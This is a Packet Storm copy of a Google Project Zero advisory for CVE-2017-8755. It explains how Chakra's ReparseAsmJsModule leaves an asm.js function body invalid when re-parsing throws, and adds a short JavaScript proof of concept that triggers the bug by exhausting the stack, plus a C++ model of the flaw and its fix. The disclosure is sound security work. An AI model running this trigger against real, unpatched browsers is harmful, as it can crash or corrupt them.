Microsoft Edge Chakra JavascriptFunction::ReparseAsmJsModule Parsing Issue

2017-09-22T00:00:00
ID PACKETSTORM:144300
Type packetstorm
Reporter Google Security Research
Modified 2017-09-22T00:00:00

Description

Microsoft Edge: Chakra: JavascriptFunction::ReparseAsmJsModule incorrectly re-parses
  
CVE-2017-8755  
  
  
This is similar to issue 1271 (/p/project-zero/issues/detail?id=1271, "Microsoft Edge: Chakra: InterpreterStackFrame::ProcessLinkFailedAsmJsModule incorrectly re-parses").
  
Here's the method used to re-parse asm.js modules:

    void JavascriptFunction::ReparseAsmJsModule(ScriptFunction** functionRef)
    {
        ParseableFunctionInfo* functionInfo = (*functionRef)->GetParseableFunctionInfo();
        Assert(functionInfo);
        // The existing body is reset *before* the re-parse is attempted.
        functionInfo->GetFunctionBody()->AddDeferParseAttribute();
        functionInfo->GetFunctionBody()->ResetEntryPoint();
        functionInfo->GetFunctionBody()->ResetInParams();

        // Parse() may throw; nothing below runs and the reset body is never repaired.
        FunctionBody * funcBody = functionInfo->Parse(functionRef);

    #if ENABLE_PROFILE_INFO
        // This is the first call to the function, ensure dynamic profile info
        funcBody->EnsureDynamicProfileInfo();
    #endif

        (*functionRef)->UpdateUndeferredBody(funcBody);
    }
  
First, it resets the function body and then re-parses it. But it doesn't consider that "functionInfo->Parse(functionRef);" may throw an exception. In that case, the function body remains reset (invalid).

We can make it throw an exception simply by exhausting the stack.
  
PoC:

    function Module() {
        'use asm';

        function f() {
        }

        return f;
    }

    function recur() {
        try {
            recur();
        } catch (e) {
            Module(1);
        }
    }

    recur();
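The defect described above is an exception-safety ordering problem: state is torn down before an operation that can throw, and the PoC's catch block then continues with the torn-down object. The following is an added illustration, not Chakra source, with a hypothetical FunctionBody model and a stack budget standing in for the real stack exhaustion; it contrasts the reported reset-then-parse ordering with a commit-on-success variant.

```cpp
// Added example (not Chakra source): models the exception-safety defect in
// ReparseAsmJsModule. State is reset, then a parser that may throw runs.
#include <stdexcept>
// Hypothetical stand-in for Chakra's FunctionBody parse state.
struct FunctionBody {
    bool deferParse = false;    // cleared by a successful parse
    bool hasEntryPoint = true;  // ResetEntryPoint() clears this
    int inParams = 1;           // ResetInParams() zeroes this
    bool valid() const { return !deferParse && hasEntryPoint && inParams > 0; }
};
struct StackExhausted : std::runtime_error {
    StackExhausted() : std::runtime_error("stack exhausted") {}
};
// Hypothetical parser: a zero stack budget stands in for the real stack
// overflow the PoC forces with unbounded recursion.
static void parseBody(FunctionBody& body, int stackBudget) {
    if (stackBudget <= 0) throw StackExhausted();
    body.deferParse = false;
    body.hasEntryPoint = true;
    body.inParams = 1;
}
// Reported ordering: reset first, parse second. If parseBody throws, the
// function body is left in its reset (invalid) state.
static void reparseUnsafe(FunctionBody& body, int stackBudget) {
    body.deferParse = true; body.hasEntryPoint = false; body.inParams = 0;
    parseBody(body, stackBudget);
}
// Exception-safe ordering: work on a copy and commit only after the parse
// succeeds, so a throw leaves the original body untouched.
static void reparseSafe(FunctionBody& body, int stackBudget) {
    FunctionBody work = body;
    work.deferParse = true; work.hasEntryPoint = false; work.inParams = 0;
    parseBody(work, stackBudget);  // may throw; `body` is still intact
    body = work;
}
// Runs one reparse attempt, swallows the exception the way the PoC's
// catch block does, and reports whether the body is still usable.
static bool reparseLeavesValid(bool useSafe, int stackBudget) {
    FunctionBody body;
    try {
        if (useSafe) reparseSafe(body, stackBudget);
        else reparseUnsafe(body, stackBudget);
    } catch (const StackExhausted&) {}
    return body.valid();
}
```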
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
  
  
  
  
Found by: lokihardt  